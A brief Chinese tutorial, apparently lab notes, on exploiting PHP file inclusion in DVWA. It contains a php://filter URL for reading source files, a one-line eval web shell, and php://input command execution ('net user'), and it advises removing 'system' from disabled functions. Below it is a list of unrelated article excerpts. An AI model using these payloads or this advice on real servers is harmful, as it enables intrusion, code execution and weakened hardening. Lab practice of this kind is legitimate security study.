PHP包含读文件写文件
读文件
php://filter/read=convert.base64-encode/是加密
http://192.168.246.11/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
<?php @eval($_POST['chopper']);?>
利用包含漏洞所在点,进行读文件,bp抓包后能看到文件的内容
将抓包读取到的文件内容解密
写文件
执行netuser命令在bp抓包里面写,构造一个语句php://input
抓包里面写自己要获得的数据发送就能看到目标主机的相关信息
注意:
allow _url_include为on的时候才可以使用,
如果想查看回显结果那必须在php-apache.ini查找
display_funtions=proc-open,oppen,exec,system…….删掉system重启apache
相关文章:
PHP包含读文件写文件
读文件 php://filter/readconvert.base64-encode/是加密 http://192.168.246.11/DVWA/vulnerabilities/fi/?pagephp://filter/readconvert.base64-encode/resourcex.php <?php eval($_POST[chopper]);?> 利用包含漏洞所在点,进行读文件,bp抓…...
uniapp——实现base64格式二维码图片生成+保存二维码图片——基础积累
最近在做二维码推广功能,自从2020年下半年到今天,大概有三年没有用过uniapp了,而且我之前用uniapp开发的程序还比较少,因此很多功能都浪费了很多时间去查资料,现在把功能记录一下。 这里写目录标题 效果图1.base64生成…...
【二叉树魔法:链式结构与递归的纠缠】
本章重点 二叉树的链式存储二叉树链式结构的实现二叉树的遍历二叉树的节点个数以及高度二叉树的创建和销毁二叉树的优先遍历和广度优先遍历二叉树基础oj练习 1.二叉树的链式存储 二叉树的链式存储结构是指,用链表来表示一棵二叉树,即用链来指示元素的逻辑…...
FL Studio21.0.3最新中文版下载安装详解
安装第一步:卸载干净fl历史旧版本,彻底退出安全软件 (如果下载好的文件无法打开,可以去百度下载一个解压工具,比如bandzip、360压缩、2345好压...)(卸载直接用电脑管家卸载或者在左下角开始处找…...
【算法与数据结构】JavaScript实现十大排序算法(一)
文章目录 关于排序算法冒泡排序选择排序插入排序希尔排序归并排序 关于排序算法 稳定排序: 在排序过程中具有相同键值的元素,在排序之后仍然保持相对的原始顺序。意思就是说,现在有两个元素a和b,a排在b的前面,且ab&…...
IntelliJ IDEA使用——插件推荐
官网插件库:https://plugins.jetbrains.com/search 代码规范检测:Alibaba Java Coding Guidelines码云:Giteemybatis插件:MyBatisX多颜色括号:Rainbow Brackets操作快捷键提示:Key Promoter X力扣ÿ…...
编写一个会导致死锁的程序,将怎么解决?
死锁发生在两个或多个线程互相等待对方释放资源的情况下。下面是一个可能导致死锁的情况: public class DeadlockExample {private static final Object lock1 = new Object();private static final Object lock2 = new...
Java JVM分析利器JProfiler 结合IDEA使用详细教程
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、JProfiler是什么?二、我的环境三、安装步骤1.Idea安装JProfiler插件1.下载程序的安装包 四、启动 前言 对于我们Java程序员而言,肯…...
包含日志文件
原理:某个PHP文件存在本地包含漏洞,却无法上传正常文件,包含漏洞却不能利用,攻击者就有可能会利用apache日志文件来入侵。 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日…...
李航老师《统计学习方法》第2章阅读笔记
感知机(perceptron)时二类分类的线性分类模型,其输入为实例的特征向量,输出为实例的类别,取1和-1二值。感知机对应于输入空间(特征空间)中将实例划分为正负两类的分离超平面 想象一下在一个平面…...
ruoyi框架修改左侧菜单样式
菜单效果 ruoyi前端框架左侧的菜单很丑,我们需要修改一下样式,下面直接看效果。 修改代码 1、sidebar.scss .el-menu-item, .el-submenu__title {overflow: hidden !important;text-overflow: ellipsis !important;white-space: nowrap !important;//…...
【已解决】PyCharm里的黄色波浪线
问题描述 有时候在PyCharm中某些代码下面会有黄色波浪线。 问题解释 黄色波浪线只是提示这段代码不规范,但对程序的运行并没有本质影响。...
)
设计模式:策略模式(C++实现)
策略模式(Strategy Pattern)是一种行为设计模式,它定义了一系列的算法,并将每个算法封装成独立的对象,使得它们可以互相替换。下面是一个使用C实现策略模式的示例: #include <iostream>// 抽象策略类…...
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行)
文章目录 一、什么是框架?二、导致框架漏洞原因二、使用步骤三、ThinkPHP介绍四、Thinkphp框架特征五、Thinkphp5.0.23 远程代码执行1、漏洞影响范围2、漏洞成因 六、POC数据包Windows下的Linux下的 七、漏洞手工复现1、先Burp抓包,把抓到的请求包发送到…...
Pdf文件签名检查
如何检查pdf的签名 首先这里有一个已经签名的pdf文件,通过pdf软件可以看到文件的数字签名。 图1为签名后的文件,图2为签名后文件被篡改。 下面就是如何代码检查这里pdf文件的签名 1.引入依赖 <dependency><groupId>org.projectlombok<…...
web前端之float布局与flex布局
float布局 <style>.nav {overflow: hidden;background-color: #6adfd0; /* 导航栏背景颜色 */}.nav a {float: left;display: block;text-align: center;padding: 14px 16px;text-decoration: none;color: #000000; /* 导航栏文字颜色 */}.nav a:hover {background-col…...
expected ‘,’ after expression in R【R错误】
出现如下错误: 在红色叉的位置,会有提示“expected . after expression”,咋一看出现红色叉的位置没有任何的错误,怎么会出现错误呢? 解决办法: 寻找这个代码第一次出现红色叉的位置,看其是否…...
算法|图论 2
LeetCode 695- 岛屿的最大面积 题目链接:力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台 题目描述:给你一个大小为 m x n 的二进制矩阵 grid 。 岛屿 是由一些相邻的 1 (代表土地) 构成的组合,这里的「相邻」要求…...
使用C#实现服务端与客户端的简陋聊天
服务端代码: using System; using System.Net.Sockets; using System.Net; using System.IO;//服务器程序 namespace CSharpStudy_09_21 {class Program{static void Main(string[] args){int port 8865;TcpClient tcpClient;//创建tcp对象IPAddress[] serverIp Dns.GetHost…...
生成式模型和判别式模型区别
目录 1.概念 2.定义 3.举例 (1)例子 A (2)例子 B 4.特点 5.优缺点 6.代表算法 1.概念 首先我们需要明确,两种不同的模型都用于监督学习任务中。监督学习的任务就是从数据中学习一个模型,并用…...
AI模型安全护栏系统:模块化设计与多层级防御实战
1. 项目概述:当AI模型需要“安全模式”在AI模型开发与部署的浪潮中,一个日益尖锐的矛盾摆在了所有从业者面前:我们如何让一个能力强大、潜力无限的模型,在开放环境中既能发挥其创造力,又能确保其行为始终处于可控、安全…...
安科瑞 EMS3.0智慧能源管理解决方案-光伏智维先知引擎,AI驱动预测性维护新范式
一、需求背景新能源光伏场站迈入规模化、长周期运营阶段,组件老化隐匿、故障识别滞后、运维被动响应、资产价值隐性流失已成为行业共性痛点。传统事后维修、定期检修模式难以应对复杂故障与隐性衰减,造成停机损失高、运维成本高、误判漏判率高。依托GB/T…...
)
YOLO26驱动的足球比赛多目标检测系统:球员、守门员、裁判与足球的实时识别(项目源码+数据集+模型权重+UI界面+python+深度学习+远程环境部署)
摘要 足球作为全球最受欢迎的体育运动之一,其数字化分析对于战术研究、运动员评估和比赛裁判具有重要意义。本文基于YOLO目标检测算法,构建了一套足球运动员识别检测系统,实现对比赛场景中足球、守门员、球员和裁判四类目标的自动检测与定位…...
5G时代LTE-A为何依然能打:从技术原理到实战场景的深度解析
1. 项目概述:一场意料之外的“降维打击”最近和几个做无线通信的朋友聊天,聊到一个挺有意思的现象:在很多公开的测试和实际部署场景里,当5G和LTE-A(LTE-Advanced,通常指4G)被放在同一个竞技场里…...
GPT Image 2 刷屏之后,我才发现真正该补的是向量引擎:deepseek v4、api、key 和 Agent 工作流实战笔记
GPT Image 2 刷屏之后,我才发现真正该补的是向量引擎:deepseek v4、api、key 和 Agent 工作流实战笔记雷猴啊,最近 AI 圈又热闹了。 前脚大家还在讨论 Agent 能不能自己写代码、自己跑任务、自己做项目;后脚 GPT Image 2 又把生图…...
AI智能体框架选型指南:从LangChain到AutoGen的实战解析
1. 项目概述:为什么我们需要一个“智能体框架”导航站?最近几年,如果你关注AI领域,尤其是大语言模型的应用开发,一定会被一个词频繁刷屏:Agent(智能体)。它不再是科幻电影里的概念&a…...
Poppins字体技术解析:跨语言几何字体的架构设计与实战应用
Poppins字体技术解析:跨语言几何字体的架构设计与实战应用 【免费下载链接】Poppins Poppins, a Devanagari Latin family for Google Fonts. 项目地址: https://gitcode.com/gh_mirrors/po/Poppins 在全球化数字产品设计中,如何为多语言用户提供…...
别再盲目升级!Claude 3 Opus仅在5类高价值场景胜出——基于127家A/B测试企业的ROI数据反推选型决策树
更多请点击: https://intelliparadigm.com 第一章:Claude 3 Opus性能评测的底层逻辑与评估范式 Claude 3 Opus 的性能评测并非简单比拼响应速度或 token 吞吐量,而是一套融合认知建模、任务分解能力与鲁棒性验证的多维评估范式。其底层逻辑建…...
自进化AI智能体:从核心架构到工程实践
1. 项目概述:从“自进化”到“智能体协作”的范式跃迁最近在GitHub上看到一个名为“RangeKing/self-evolving-agent”的项目,这个标题本身就充满了吸引力。作为一个长期关注AI Agent(智能体)领域发展的从业者,我深知“…...
2026年广州商务接待服务哪家服务专业,价格实惠
在广州这座商业之都,高端商务接待服务的需求日益增长。然而,许多企业在选择商务接待服务时,常常面临流程不规范、细节把控不到位、资源匹配不合理等问题。特别是在政企宴请、圈层活动和企业商务配套服务方面,如何确保高标准的服务…...